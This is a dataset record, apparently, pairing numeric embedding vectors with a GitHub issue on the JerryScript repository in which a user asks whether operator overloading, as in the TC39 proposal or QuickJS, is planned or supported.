-0.0016073586884886026, 0.012473873794078827, 0.010287095792591572, 0.0024543502368032932, 0.0033379162196069956, 0.014052357524633408, 0.017340224236249924, 0.017848419025540352, -0.009085907600820065, -0.006032888777554035, -0.012196676805615425, -0.007353425491601229, -0.026333732530474663, -0.017155425623059273, -0.009986799210309982, -0.006937629543244839, -0.014129356481134892, -0.00021475563698913902, -0.0029432952869683504, 0.0035554389469325542, -0.019465403631329536, -0.0027142225299030542, -0.009293805807828903, 0.009363105520606041, -0.009447804652154446, -0.018310414627194405, 0.021636780351400375, 0.00008229291415773332, -0.007800021208822727, -0.013097567483782768, -0.01834121346473694, -0.005913540255278349, 0.002885545836761594, 0.0025428992230445147, 0.003374490886926651, -0.05734901875257492, 0.006691232323646545, -0.01385985966771841, 0.01757122203707695, 0.005028048995882273, 0.009740401059389114, -0.014776150695979595, 0.006163787562400103, 0.0021810028702020645, -0.01880320906639099, 0.012774170376360416, -0.016986027359962463, 0.02447035163640976, 0.008962709456682205, -0.013143766671419144, 0.0024023756850510836, 0.04887910559773445, -0.0014716476434841752, 0.02228357456624508, 0.012666371650993824, -0.012458473443984985, 0.011803979985415936, -0.008854910731315613, 0.02071279101073742, -0.010348695330321789, 0.003031844273209572, -0.02072818949818611, 0.012335275299847126, -0.018402813002467155, -0.008662411943078041, -0.00412715831771493, 0.005620942916721106, -0.008947309106588364, -0.024685949087142944, 0.011734681203961372, -0.011842479929327965, 0.013390164822340012, 0.017109226435422897, 0.010271696373820305, 0.03246287256479263, -0.0014052357291802764, 0.009016608819365501, 0.006090638227760792, -0.003020294476300478, 0.007480474188923836, 0.00443515507504344, -0.012620172463357449, -0.02003519795835018, -0.01162688247859478, -0.019249804317951202, 0.006960729602724314, 0.0080387182533741, -0.01791001856327057, -0.015877239406108856, -0.00921680685132742, -0.016185235232114792, 0.019988996908068657, 0.0011848255526274443, -0.017463423311710358, 0.018079416826367378, -0.03751401975750923, 0.004054008983075619, 0.017016828060150146, -0.02719612419605255, 0.010995488613843918, -0.030460892245173454, -0.011218786239624023, 0.00725717656314373, -0.013998458161950111, -0.01171928085386753, -0.01740182377398014, 0.004827850963920355, -0.024331754073500633, 0.000016317217159667052, 0.0061368378810584545, -0.022683970630168915, 0.031508080661296844, -0.030199093744158745, -0.0187878105789423, -0.0012666371185332537, 0.012435373850166798, -0.0002408631844446063, 0.0034418650902807713, 0.031785279512405396, -0.012635571882128716, -0.012265975587069988, 0.02306896634399891, -0.009755801409482956, 0.02219117432832718, -0.022160375490784645, 0.0015755965141579509, -0.004034759011119604, 0.0036170382518321276, 0.006456384435296059, -0.01416015625, -0.015138046815991402, 0.0005048261373303831, -0.0006588245742022991, 0.00114247587043792, -0.011988778598606586, -0.0006193624576553702, -0.008554613217711449, -0.0030356943607330322, -0.000015790856195962988, 0.01565394178032875, -0.0008826035773381591, -0.0047470019198954105, 0.03286326676607132, -0.01992739737033844, 0.021975576877593994, 0.004762401804327965, 0.02594873681664467, 0.021836979314684868, 0.002213727682828903, 0.00732262572273612, 0.010980089195072651, 0.009070508182048798, -0.010687491856515408, -0.019527001306414604, 0.009032008238136768, 0.006086788140237331, -0.010210096836090088, -0.0028297214303165674, 0.007780771236866713, -0.010702891275286674, -0.0015438343398272991, 0.013451763428747654, 0.005740291904658079, 0.012982068583369255, -0.02431635372340679, 0.0006799993570894003, 0.01288966927677393, 0.006564183626323938, 0.008893409743905067, 0.0022753269877284765, -0.005320646334439516, 0.017448022961616516, 0.004154107999056578, 0.005247496999800205, -0.006059838458895683, -0.001982729882001877, 0.030999885872006416, 0.014883949421346188, 0.000551025674212724, -0.0025140244979411364, 0.006286986172199249, -0.004154107999056578, 0.008061818778514862, -0.015130346640944481, 0.017278624698519707, 0.008315916173160076, 0.017463423311710358, -0.00970190204679966, 0.02630293369293213, -0.015138046815991402, -0.002681497950106859, 0.007850070483982563, 0.003054944099858403, 0.0001701201545074582, -0.0065680332481861115, -0.03332526236772537, 0.024239353835582733, 0.011773181147873402, 0.01062589231878519, -0.005405345465987921, -0.003794136457145214, 0.0019028432434424758, 0.012289075180888176, 0.01385985966771841, -0.009694201871752739, 0.004508304409682751, 0.0005736441817134619, 0.002377350814640522, 0.000938909244723618, -0.005524693988263607, -0.006510284263640642, 0.015761740505695343, 0.001362886163406074, -0.0051396978087723255, 0.018402813002467155, -0.018310414627194405, -0.020497191697359085, 0.02072818949818611, 0.0048086014576256275, -0.013474863953888416, 0.02142118290066719, 0.005370695609599352, -0.02140578255057335, 0.00773457158356905, 0.01592343859374523, 0.017894618213176727, 0.016046637669205666, 0.024100756272673607, -0.005798041354864836, -0.006106038112193346, -0.005451544653624296, 0.01240457408130169, -0.015153446234762669, -0.00027262535877525806, -0.007680672220885754, 0.011234186589717865, -0.015861839056015015, 0.00563634280115366, -0.015014847740530968, 0.013035967946052551, -0.004527553915977478, 0.012289075180888176, -0.005786491557955742, 0.0021020786371082067, -0.018633810803294182, 0.01994279772043228, 0.007264876272529364, -0.009193707257509232, 0.029167303815484047, -0.007214826997369528, 0.02035859413444996, 0.008893409743905067, 0.011311185546219349, -0.0005226322100497782, -0.007676822133362293, -0.00007952575833769515, -0.014737650752067566, -0.019711799919605255, 0.026364533230662346, -0.000935540534555912, 0.012558572925627232, -0.008824110962450504, -0.007026178762316704, -0.017432622611522675, 0.016893628984689713, -0.019804200157523155, -0.01097238902002573, 0.01014079712331295, 0.0027430972550064325, 0.021806178614497185, 0.010225496254861355, -0.004723902326077223, -0.0035361892078071833, 0.014283355325460434, 0.016015836969017982, -0.025594539940357208, 0.014837749302387238, 0.005413045175373554, 0.015499942936003208, 0.004050158895552158, 0.004146407824009657, 0.009809700772166252, -0.005647892598062754, 0.006972279399633408, -0.013698161579668522, -0.02263777144253254, 0.015715541318058968, 0.021544381976127625, -0.034064456820487976, -0.006040588952600956, -0.01600043848156929, 0.006937629543244839, 0.004627652931958437, 0.01714002713561058, -0.0073996251448988914, 0.00420030765235424, 0.009686501696705818, -0.01372126117348671, -0.0026237484999001026, 0.03295566514134407, -0.0043543060310184956, 0.021528981626033783, -0.008154217153787613, 0.017063027247786522, 0.005505444016307592, -0.0012781870318576694, 0.035696838051080704, 0.008462213911116123, -0.03508084639906883, 0.004635353107005358, 0.01904960721731186, 0.015684740617871284, -0.006321636028587818, -0.008516114205121994, -0.009948299266397953, -0.01035639550536871, 0.01192717906087637, 0.0186954103410244, 0.004758551716804504, -0.028597509488463402, -0.02160598151385784, -0.009055107831954956, -0.005963589530438185, 0.004596853628754616, 0.013782860711216927, 0.004096358548849821, -0.022083375602960587, 0.013128367252647877, -0.003992409445345402, -0.004843250848352909, 0.00003443910463829525, 0.01889560930430889, -0.010410294868052006, 0.009732701815664768, -0.009378504939377308, 0.002078979043290019, 0.028351113200187683, -0.0015919589204713702, 0.04546033963561058, 0.019018806517124176, -0.006013639271259308, 0.007453524507582188, -0.009878999553620815, 0.013405564241111279, 0.007545923348516226, -0.010202396661043167, 0.008762511424720287, 0.01432955451309681, -0.017879219725728035, 0.014937848784029484, -0.002825871342793107, -0.019696399569511414, -0.008269716054201126, -0.0025948737747967243, -0.0022272025234997272, 0.010702891275286674, 0.01915740594267845, -0.010194696485996246, 0.0013109117280691862, 0.01240457408130169, -0.02342316322028637, 0.014745350927114487, -0.014044657349586487, 0.003193542594090104, -0.003391815582290292, 0.000055343189160339534, 0.029675498604774475, -0.002363875973969698, 0.014214055612683296, -0.003840336110442877, 0.006710481829941273, -0.009232206270098686, -0.002465900033712387, 0.005205147434026003, -0.008123417384922504, -0.0029490701854228973, 0.010595092549920082, 0.004531404003500938, 0.0072379265911877155, 0.008377514779567719, -0.002365801017731428, 0.005605543032288551, -0.03760641813278198, -0.00570564204826951, 0.006260036490857601, -0.02482454851269722, -0.0004915918689221144, -0.02597953751683235, 0.0014533603098243475, -0.00997139886021614, 0.008539213798940182, 0.004073258955031633, -0.013020568527281284, -0.0242085549980402, 0.000617437472101301, -0.02684192731976509, -0.011049387976527214, -0.0027700469363480806, -0.0062638865783810616, 0.01626223511993885, 0.0094863036647439, 0.0042657568119466305, 0.0020289295352995396, 0.01529204472899437, 0.02807391621172428, -0.035019244998693466, -0.00997139886021614, 0.007053128443658352, -0.007757671643048525, -0.013651961460709572, 0.010333294980227947, 0.0025948737747967243, 0.011642281897366047, -0.045059945434331894, -0.012473873794078827, 0.013328565284609795, -0.016493232920765877, -0.021005386486649513, -0.009555603377521038, -0.005047298967838287, 0.02570234052836895, -0.025455942377448082, 0.02246837317943573, -0.03043009154498577, -0.003794136457145214, 0.01114178728312254, 0.015199646353721619, 0.005259046796709299, -0.019126607105135918, 0.008908810093998909, 0.003842261154204607, 0.007033878937363625, -0.011511383578181267, -0.002979869721457362, 0.006849080789834261, -0.015784841030836105, 0.0018739685183390975, -0.0022888018283993006, 0.0062369368970394135, -0.02045099250972271, 0.01888020895421505, 0.0037864367477595806, -0.01837201416492462, 0.01062589231878519, 0.0008744223741814494, -0.006937629543244839, 0.005890440195798874, -0.003018369432538748, 0.009370804764330387, 0.014344954863190651, -0.017078427597880363, 0.00001711428012640681, -0.005205147434026003, 0.0005327383405528963, -0.009494003839790821, 0.01624683476984501, 0.0009413154912181199, 0.03923880308866501, -0.003609338542446494, 0.002452425193041563, 0.008339015766978264, -0.024778349325060844, 0.0057826414704322815, -0.017602020874619484, -0.003655537962913513, 0.007280276156961918, -0.0018826309824362397, -0.016385434195399284, -0.0018325814744457603, -0.026687929406762123, 0.0016862829215824604, 0.012396874837577343, 0.02483994886279106, 0.006864480674266815, -0.030383892357349396, 0.003936585038900375, 0.004966449923813343, -0.00419645756483078, -0.011911779642105103, -0.002111703623086214, -0.003166592912748456, 0.010086897760629654, 0.01302826777100563, -0.0049356501549482346, -0.002252227161079645, -0.006960729602724314, -0.0228995680809021, -0.008161917328834534, -0.036066435277462006, -0.00007976638153195381, 0.022252773866057396, 0.0203739944845438, 0.013906058855354786, 0.002685347804799676, 0.014144756831228733, -0.012496973387897015, 0.003320591291412711, -0.016046637669205666, 0.006487184204161167, -0.014013858512043953, -0.001001952332444489, 0.001965405186638236, 0.0010337145067751408, 0.00014750163245480508, -0.002552524209022522, -0.027319323271512985, -0.0062638865783810616, 0.027257723733782768, -0.002866295864805579, 0.005613243207335472, -0.02072818949818611, 0.006864480674266815, 0.002105928724631667, 0.015315145254135132, -0.00666813226416707, 0.004150257911533117, 0.02020459622144699, 0.006479484494775534, 3.759727462693263e-8, -0.0032089424785226583, 0.01723242551088333, 0.023007366806268692, 0.0013638486852869391, 0.021744579076766968, 0.0036112633533775806, -0.009478604421019554, 0.005020349286496639, 0.0002752722066361457, -0.01109558716416359, 0.026903526857495308, 0.020681990310549736, -0.001121301087550819, -0.022422172129154205, 0.0012993618147447705, 0.022529972717165947, 0.0005784566164948046, -0.0050126491114497185, -0.035635240375995636, 0.020743589848279953, -0.008931909687817097, 0.006086788140237331, -0.008539213798940182, 0.02018919587135315, 0.010071498341858387, -0.016986027359962463, 0.00725332647562027, -0.012019578367471695, 0.020065996795892715, -0.013913759030401707, 0.00611758790910244, -0.003980859648436308, 0.029490701854228973, 0.0020828288979828358, -0.017786819487810135, -0.00646793469786644, -0.005289846565574408, 0.00629853643476963, 0.0021425033919513226, -0.007688371930271387, -0.003386040683835745, -0.017632821574807167, 0.0038037614431232214, -0.017509622499346733, -0.005532394163310528, -0.017509622499346733, -0.0012069627409800887, 0.006275436375290155, -0.0021829279139637947, 0.0007512236479669809, 0.00605598883703351, 0.001996204722672701, 0.013659661635756493, 0.011688482016324997, -0.009609502740204334, -0.01697062887251377, -0.005205147434026003, 0.01895720884203911, -0.005028048995882273, -0.002972169779241085, 0.026010336354374886, 0.008377514779567719, 0.017448022961616516, -0.0037787368055433035, 0.0034765147138386965, -0.004804751370102167, -0.0063023860566318035, 0.00822351686656475, 0.00580959115177393, -0.0006896242848597467, 0.010849189944565296, 0.009324605576694012, -0.00007284848106792197, 0.01161918230354786, 0.009678801521658897, -0.012681772001087666, 0.034064456820487976, 0.015261244960129261, -0.018864808604121208, -0.02282256819307804, -0.010086897760629654, 0.03138488158583641, -0.0032224173191934824, -0.012843470089137554, -0.0009384279837831855, -0.004877900704741478, 0.013805960305035114, 0.052913863211870193, 0.007576723117381334, -0.006452534813433886, -0.002232977421954274, -0.002025079447776079, -0.030029695481061935, -0.021698379889130592, 0.03498844429850578, 0.002592948731034994, 0.03310966491699219, 0.005054998677223921, -0.0063254861161112785, 0.011688482016324997, 0.012789570726454258, 0.010595092549920082, 0.007234076503664255, 0.039823997765779495, 0.011896379292011261, -0.017093826085329056, 0.00804641842842102, 0.005143547896295786, -0.012081177905201912, 0.02212957665324211, 0.0018951433012261987, 0.0027835217770189047, 0.005694092251360416, 0.02254537120461464, -0.02989109791815281, -0.02658013068139553, -0.00040857712156139314, 0.0031839178409427404, 0.0012781870318576694, -0.007688371930271387, -0.0270113255828619, -0.01915740594267845, -0.004027059301733971, -0.007642172742635012, -0.0007021366618573666, -0.0003214717435184866, 0.022683970630168915, -0.005644042976200581, -0.014314155094325542, -0.001296474365517497, 0.013875259086489677, 0.001463947701267898, -0.02744252234697342, 0.015007147565484047, -0.012812670320272446, 0.0006727806758135557, 0.007615223061293364, 0.003051094012334943, 0.007076228503137827, -0.010248595848679543, -0.011403584852814674, 0.013490263372659683, 0.007642172742635012, 0.007207126822322607, 0.002947145141661167, 0.01158068235963583, 0.005794191267341375, 0.0031762178987264633, 0.010094597935676575, -0.0071724774315953255, 0.013397864066064358, 0.011996478773653507, 0.010571992956101894, 0.0006593058351427317, -0.001236799987964332, -0.005613243207335472, 0.02480914816260338, -0.006695082411170006, -0.027765918523073196, -0.005351445637643337, 0.006625782698392868, -0.003980859648436308, 0.00883181020617485, -0.007830820977687836, -0.007884720340371132, 0.004977999720722437, 0.009986799210309982, 0.021698379889130592, -0.02691892720758915, 0.0057210419327020645, 0.013890659436583519, 0.0010077273473143578, 0.00426190672442317, -0.01389835961163044, 0.007703771814703941, -0.006575733423233032, 0.014868549071252346, -0.007595973089337349, -0.026102734729647636, -0.02273016981780529, -0.002879770938307047, 0.026256734505295753, -0.00966340210288763, -0.010287095792591572, 0.006440984550863504, 0.024331754073500633, -0.014013858512043953, -0.007642172742635012, -0.014907049015164375, 0.02474754862487316, 0.02614893577992916, 0.02097458764910698, 0.0218677781522274, -0.004954899661242962, 0.017263224348425865, 0.026333732530474663, -0.009301505982875824, 0.004415905103087425, 0.0038384110666811466, 0.00257947389036417, 0.0022349024657160044, 0.0032281922176480293, -0.011372785083949566, -0.017540423199534416, -0.02658013068139553, -0.005859640426933765, 0.008377514779567719, 0.02185237780213356, 0.02114398591220379, 0.011010888032615185, 0.017802219837903976, -0.017417224124073982, -0.004874050617218018, -0.0022695520892739296, 0.010171596892178059, -0.008308215998113155, -0.0015197721077129245, 0.002810471458360553, -0.009686501696705818, 0.005085798446089029, -0.02527114376425743, 0.05251346901059151, 0.006036738865077496, 0.016216035932302475, -0.01861841231584549, 0.0011588382767513394, -0.003414915408939123, -0.0024870748165994883, -0.007776921149343252, -0.0281355157494545, 0.008670112118124962, -0.0047200522385537624, -0.00508964853361249, 0.009039708413183689, -0.01092618890106678, -0.0005620943265967071, -0.017525022849440575, -0.00646793469786644, -0.0027488721534609795, -0.003674787702038884, -0.028736108914017677, -0.006695082411170006, -0.008647012524306774, 0.01888020895421505, 0.006937629543244839, 0.004215707071125507, -0.005078098736703396, -0.009247606620192528, 0.0008027168805710971, -0.0016728080809116364, -0.01992739737033844, 0.002385050756856799, -0.019881198182702065, 0.007307225838303566, -0.012258275412023067, 0.01774062030017376, 0.014475853182375431, 0.0005260009202174842, 0.014244855381548405, 0.006525683682411909, -0.029583100229501724, 0.004096358548849821, 0.013290065340697765, -0.019988996908068657, 0.010772190988063812, -0.003145418129861355, 0.00790781993418932, -0.0015014847740530968, -0.023022767156362534, 0.02902870625257492, -0.03086128830909729, -0.007087778300046921, 0.005509294103831053, -0.00749202398583293, 0.0005789378774352372, 0.0037768117617815733, -0.02078978903591633, -0.0037094373255968094, -0.004277306608855724, 0.009209106676280499, -0.015207345597445965, -0.004346605855971575, -0.02439335361123085, 0.008485314436256886, 0.001964442664757371, -0.015892639756202698, 0.003033769316971302, -0.0010000274050980806, -0.008801010437309742, -0.002184852957725525, 0.01755582168698311, 0.01563854143023491, -0.004057859070599079, 0.008200417272746563, -0.013744360767304897, -0.01516884658485651, -0.01643163338303566, 0.03751401975750923, -0.004034759011119604, -0.0043042562901973724, 0.0014774225419387221, -0.0029432952869683504, -0.012158176861703396, -0.009802000597119331, -0.00904740858823061, -0.0040001096203923225, 0.0007363050244748592, -0.01695522852241993, -0.009263006038963795, -0.01677042990922928, -0.012273675762116909, -0.020943786948919296, 0.004246506839990616, -0.009586403146386147, 0.010764490813016891, -0.022699370980262756, 0.0173864234238863, -0.013767460361123085, 0.018064016476273537, 0.003848036052659154, 0.004516004119068384, -0.007619072683155537, 0.006313935853540897, -0.013936858624219894, -0.005694092251360416, -0.00257754884660244, -0.01583104021847248, 0.000002090408543153899, -0.015530742704868317, -0.014606752432882786, -0.006760531570762396, 0.01258167251944542, 0.006417884957045317, -0.006132987793534994, 0.006618082989007235, 0.004854800645262003, -0.001469722599722445, 0.014837749302387238, -0.007180177140980959, 0.010725991800427437, 0.000854691315907985, -0.007626772858202457, 0.015592342242598534, 0.019819598644971848, -0.0018884058808907866, -0.007796171121299267, -0.0038441859651356936, 0.005451544653624296, 0.030999885872006416, -0.0011174512328580022, 0.007003079168498516, -0.0011386260157451034, -0.016847429797053337, -0.005289846565574408, 0.000808491837233305, -0.007095478009432554, 0.014722251333296299, 0.0011472883634269238, 0.0020616541150957346, 0.010633592493832111, -0.0033841156400740147, -0.007984818890690804, 0.05377625674009323, 0.00701847905293107, 0.0038903856184333563, -0.021790780127048492, -0.015684740617871284, -0.013528763316571712, 0.002677647862583399, -0.00636013550683856, -0.01563854143023491, 0.014214055612683296, -0.008901109918951988, 0.01704762689769268, -0.0024832249619066715, -0.003287866711616516, 0.006822131108492613, 0.0016391208628192544, 0.01792541891336441, -0.037637218832969666, -0.005316796246916056, 0.008339015766978264, -0.008546913042664528, -0.007699922192841768, 0.00857001356780529, -0.007511273957788944, -0.013159167021512985, -0.00038788357051089406, -0.00840061530470848, 0.021282585337758064, -0.003842261154204607, -0.0134132644161582, 0.021005386486649513, -0.010595092549920082, -0.0062638865783810616, 0.0029298202134668827, 0.008808710612356663, -0.008539213798940182, -0.0001610968029126525, 0.0007877982570789754, 0.02482454851269722, 0.0063254861161112785, -0.004542953800410032, -0.01723242551088333, 0.02001979760825634, -0.0030684189405292273, -0.00395390996709466, -0.018988007679581642, 0.001457210280932486, 0.023731159046292305, 0.007884720340371132, 0.015037947334349155, -0.02132878452539444, 0.025394342839717865, -0.014090857468545437, -0.025656139478087425, 0.00834671501070261, 0.014406554400920868, -0.022237375378608704, 0.010956988669931889, -0.022252773866057396, -0.0015342094702646136, -0.014260255731642246, -0.0323396734893322, -0.0012810744810849428 ]
2,044
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
Hello, I am currently looking for an embeddable JS engine and one concern is Operator Overloading: https://github.com/tc39/proposal-operator-overloading/ There is one engine that supports it: https://bellard.org/quickjs/jsbignum.html#Operator-overloading Which is highly useful for everything related to math (and microcontrollers/robots control their environment via math). Is this a planned feature or is there some support for it already?
Operator Overloading as proposed or like QuickJS
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4671/comments
2
2021-05-14T11:19:10
2021-12-08T14:33:29Z
https://github.com/jerryscript-project/jerryscript/issues/4671
891,839,719
4,671
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Operator Overloading as proposed or like QuickJS Issue date: --- start body --- Hello, I am currently looking for an embeddable JS engine and one concern is Operator Overloading: https://github.com/tc39/proposal-operator-overloading/ There is one engine that supports it: https://bellard.org/quickjs/jsbignum.html#Operator-overloading Which is highly useful for everything related to math (and microcontrollers/robots control their environment via math). Is this a planned feature or is there some support for it already? --- end body ---
623
[ -0.027245253324508667, -0.004281932953745127, -0.021330855786800385, 0.001424183719791472, 0.0065823933109641075, 0.03176361322402954, 0.027305297553539276, 0.04479329660534859, -0.024498211219906807, 0.052148766815662384, 0.015138753689825535, 0.013495031744241714, 0.013510042801499367, 0.026299549266695976, 0.00450334744527936, 0.07679709047079086, -0.02686997316777706, -0.004469572566449642, -0.04863615334033966, 0.007347962353378534, 0.019934818148612976, 0.012436744756996632, -0.03452566638588905, 0.00345819559879601, -0.006030733231455088, 0.01437318418174982, 0.0009555540746077895, 0.0007744819740764797, -0.05407019332051277, -0.012849551625549793, 0.007062749937176704, -0.0017994625959545374, -0.023762663826346397, 0.010890595614910126, 0.037738051265478134, 0.0019852258265018463, 0.03755791857838631, 0.018343636766076088, -0.04749530553817749, -0.027230242267251015, -0.0037283964920789003, -0.024798434227705002, -0.001808844623155892, 0.03530624508857727, 0.009517074562609196, 0.05407019332051277, 0.021405912935733795, -0.01032017171382904, 0.005707993172109127, 0.00784333050251007, 0.03242410346865654, -0.036417070776224136, 0.029586993157863617, -0.01437318418174982, -0.011108257807791233, -0.006845088209956884, 0.012894585728645325, -0.007089019753038883, 0.02230658195912838, -0.01601690612733364, -0.01702265441417694, -0.050017181783914566, -0.01888403855264187, 0.0034094094298779964, -0.019304350018501282, 0.021796202287077904, -0.020550277084112167, 0.021541012451052666, 0.0026644805911928415, 0.013277369551360607, -0.02659977227449417, 0.019469473510980606, 0.029571982100605965, 0.054160259664058685, -0.012053960002958775, -0.0023811450228095055, 0.022756917402148247, -0.007543107029050589, 0.020190007984638214, 0.0058956327848136425, 0.02505362406373024, 0.047795530408620834, -0.033594973385334015, -0.017773211002349854, -0.005178849678486586, -0.0204301867634058, -0.0009227171540260315, -0.0602848120033741, -0.0012843923177570105, 0.023792685940861702, -0.031643521040678024, 0.05112800747156143, 0.00467222323641181, 0.012992157600820065, 0.02083548903465271, 0.025684092193841934, -0.007554365787655115, -0.017593078315258026, -0.01580674946308136, 0.02151099033653736, 0.04641450196504593, 0.040169861167669296, 0.00416934909299016, 0.011273380368947983, 0.007985936477780342, 0.017442965880036354, 0.025098657235503197, -0.02586422674357891, 0.010185071267187595, 0.06352722644805908, 0.0052651637233793736, -0.032454125583171844, -0.04761539399623871, 0.019184261560440063, -0.010642911307513714, 0.03716762736439705, -0.003713385434821248, -0.04389262944459915, 0.017322877421975136, 0.001816350151784718, -0.014553318731486797, 0.021811213344335556, -0.022937050089240074, -0.049416735768318176, -0.03608682379126549, -0.009014200419187546, -0.005437792278826237, -0.01781824603676796, 0.04587410017848015, 0.005963183008134365, -0.05923403054475784, 0.0043945168145000935, 0.014155522920191288, -0.02948191575706005, 0.03518615663051605, 0.02370261959731579, 0.04185111075639725, 0.056231800466775894, -0.032394081354141235, -0.04031997174024582, -0.017247822135686874, -0.020325109362602234, 0.024197988212108612, 0.04104050621390343, -0.03476584330201149, 0.008969167247414589, -0.011993915773928165, 0.05866360664367676, 0.0017553673824295402, -0.0038278454449027777, 0.03869876638054848, -0.009989925660192966, 0.003906654193997383, -0.03095300868153572, 0.009809792041778564, 0.03524620085954666, -0.03983961418271065, 0.009644669480621815, 0.026975052431225777, 0.021315844729542732, -0.05271919071674347, -0.03344486281275749, 0.02003989741206169, 0.030202452093362808, -0.03368503972887993, 0.04104050621390343, -0.0064547983929514885, 0.03401528671383858, 0.015011158771812916, 0.014628374017775059, -0.017803234979510307, -0.007760769221931696, 0.016227062791585922, 0.011446008458733559, -0.0024355605710297823, 0.017322877421975136, 0.025038613006472588, -0.01774318888783455, 0.007362973410636187, -0.022681860253214836, -0.002872760407626629, -0.009156806394457817, -0.004353235941380262, -0.0013313021045178175, 0.0022610558662563562, -0.020129963755607605, -0.005587903782725334, -0.025639059022068977, 0.011828793212771416, -0.025548992678523064, 0.007089019753038883, 0.018343636766076088, -0.03033755160868168, -0.011273380368947983, 0.025143690407276154, 0.0007801111787557602, -0.006357225589454174, -0.052358921617269516, 0.006030733231455088, 0.005066266283392906, 0.04044006019830704, -0.03221394494175911, -0.0034525664523243904, -0.030037328600883484, -0.02331233024597168, -0.03863872215151787, 0.010995673947036266, -0.027080129832029343, 0.01634715124964714, -0.02961701527237892, 0.024137943983078003, 0.019799718633294106, -0.007122794631868601, -0.01787829026579857, -0.029767127707600594, 0.007370478939265013, 0.022756917402148247, -0.03296450525522232, -0.017457976937294006, -0.042631689459085464, -0.0034825887996703386, -0.004255663603544235, -0.019379405304789543, 0.011506052687764168, -0.0475553497672081, -0.02861126884818077, -0.01634715124964714, 0.00443954998627305, -0.001383841154165566, -0.0002297410974279046, 0.03986963629722595, 0.021856246516108513, -0.0025237509980797768, -0.011723714880645275, 0.013675165362656116, -0.030187441036105156, -0.007212861906737089, -0.013727704994380474, 0.003244286635890603, 0.023732641711831093, -0.03452566638588905, -0.006811313331127167, -0.047585371881723404, -0.033594973385334015, -0.02385273203253746, 0.012369194999337196, 0.003266803454607725, 0.02451322227716446, -0.02539888024330139, -0.0028052101843059063, -0.02364257536828518, -0.014072961173951626, -0.013517548330128193, -0.03764798492193222, -0.00015867264301050454, -0.007453040219843388, 0.024828456342220306, 0.051758475601673126, -0.020144974812865257, -0.019874773919582367, 0.014966125600039959, 0.015341403894126415, -0.04248157888650894, 0.008286159485578537, -0.03362499549984932, -0.02236662618815899, -0.02037014253437519, -0.018869025632739067, -0.015056191943585873, -0.015896817669272423, 0.013915344141423702, -0.03944932669401169, 0.006019474472850561, 0.06376740336418152, -0.034855909645557404, -0.006049497053027153, -0.014050444588065147, 0.020595310255885124, 0.029181692749261856, -0.01245926134288311, 0.016046928241848946, 0.05914396420121193, 0.06238637492060661, 0.04929664358496666, 0.03710758313536644, 0.010147543624043465, 0.0024543243926018476, -0.0014485768042504787, -0.027170198038220406, -0.03938927873969078, -0.015446482226252556, -0.04503347724676132, 0.0006811313214711845, 0.01841869205236435, 0.012083983048796654, 0.011866320855915546, 0.005407769698649645, -0.0381583645939827, 0.017367910593748093, -0.009359457530081272, -0.018568802624940872, -0.04329218342900276, 0.01356258150190115, -0.006150822155177593, -0.032394081354141235, 0.0029046591371297836, 0.013712693005800247, 0.03035256266593933, -0.01816350221633911, -0.010500305332243443, 0.03503604605793953, -0.04683481529355049, -0.006345967296510935, -0.02472337894141674, -0.013675165362656116, 0.05016729235649109, 0.0522688552737236, 0.014635879546403885, -0.03836852312088013, -0.022877005860209465, -0.0016258960822597146, -0.00236238120123744, -0.014643385075032711, -0.007190344855189323, 0.011430997401475906, 0.0008819055510684848, -0.015521538443863392, -0.027710599824786186, -0.02083548903465271, -0.017728177830576897, 0.01466590166091919, -0.01158861443400383, -0.03629698231816292, -0.019679628312587738, -0.025669081136584282, -0.05926405265927315, -0.047855574637651443, 0.038218408823013306, 0.005287680774927139, -0.007224120199680328, 0.0043569887056946754, 0.006053249817341566, -0.003921665251255035, 0.017698155716061592, 0.02759050950407982, -0.041430797427892685, -0.0098848482593894, 0.023132195696234703, 0.04335222765803337, 0.052358921617269516, 0.0009654051391407847, 0.014410712756216526, 0.015821760520339012, -0.01520630344748497, 0.042631689459085464, -0.049206577241420746, 0.0027414129581302404, -0.0388789027929306, -0.0074868155643343925, 0.013329909183084965, -0.02934681437909603, -0.020265065133571625, 0.007047738879919052, 0.020685376599431038, -0.004345730412751436, 0.03677733987569809, -0.020595310255885124, -0.012309149838984013, -0.03461573272943497, -0.03269430249929428, -0.009787275455892086, -0.02551897056400776, 0.012038948945701122, -0.011168302036821842, -0.024828456342220306, -0.00718659209087491, -0.02056528814136982, 0.004540875554084778, -0.022156469523906708, 0.04386260733008385, -0.028115900233387947, 0.009201840497553349, 0.00443954998627305, -0.04368247091770172, -0.021195756271481514, -0.00851132720708847, 0.006893874611705542, 0.001064854091964662, 0.018914060667157173, 0.024273043498396873, 0.02091054432094097, 0.034075330942869186, -0.030037328600883484, -0.017427954822778702, -0.0395393930375576, 0.022396648302674294, -0.02592427097260952, -0.04770546406507492, 0.0003081978647969663, -0.00034080020850524306, 0.01756305620074272, -0.05545122176408768, -0.012616879306733608, 0.04803570732474327, -0.030367573723196983, 0.0012337296502664685, -0.03878883272409439, -0.02331233024597168, 0.01801338978111744, 0.020850500091910362, -0.019064171239733696, -0.018388669937849045, -0.003779059275984764, 0.015078708529472351, 0.050917848944664, 0.012849551625549793, 0.01781824603676796, -0.00659740436822176, -0.025834204629063606, -0.009359457530081272, -0.00998242013156414, -0.024603288620710373, -0.003970451653003693, -0.01198641024529934, -0.029692072421312332, -0.021691124886274338, -0.0076631964184343815, -0.019919807091355324, 0.04266171157360077, -0.0207604318857193, -0.005467814393341541, -0.004041754640638828, -0.005419028457254171, 0.021856246516108513, 0.003454442834481597, 0.0030247485265135765, 0.010973157361149788, -0.009524580091238022, -0.04446305334568024, 0.01654229685664177, 0.03632700443267822, 0.007411759812384844, -0.027905743569135666, -0.006057002581655979, 0.00208655116148293, 0.012894585728645325, -0.04596416652202606, -0.024873489513993263, -0.009284401312470436, 0.013262358494102955, 0.007362973410636187, -0.025473935529589653, -0.014253094792366028, 0.0014645261690020561, -0.007591893430799246, -0.009794780984520912, -0.004874873906373978, 0.015431471168994904, 0.00017790569108910859, 0.005464061629027128, 0.0278006661683321, 0.035066068172454834, 0.006451045628637075, 0.018793970346450806, 0.028446145355701447, 0.0077007245272397995, -0.011415986344218254, -0.02091054432094097, 0.0025669080205261707, -0.00018834312504623085, -0.005617926362901926, 0.017848268151283264, 0.024738389998674393, 0.026644807308912277, -0.02598431520164013, 0.008503821678459644, 0.009907364845275879, 0.0005591656663455069, -0.021886268630623817, -0.016782475635409355, 0.029376838356256485, -0.07289418578147888, -0.024813445284962654, 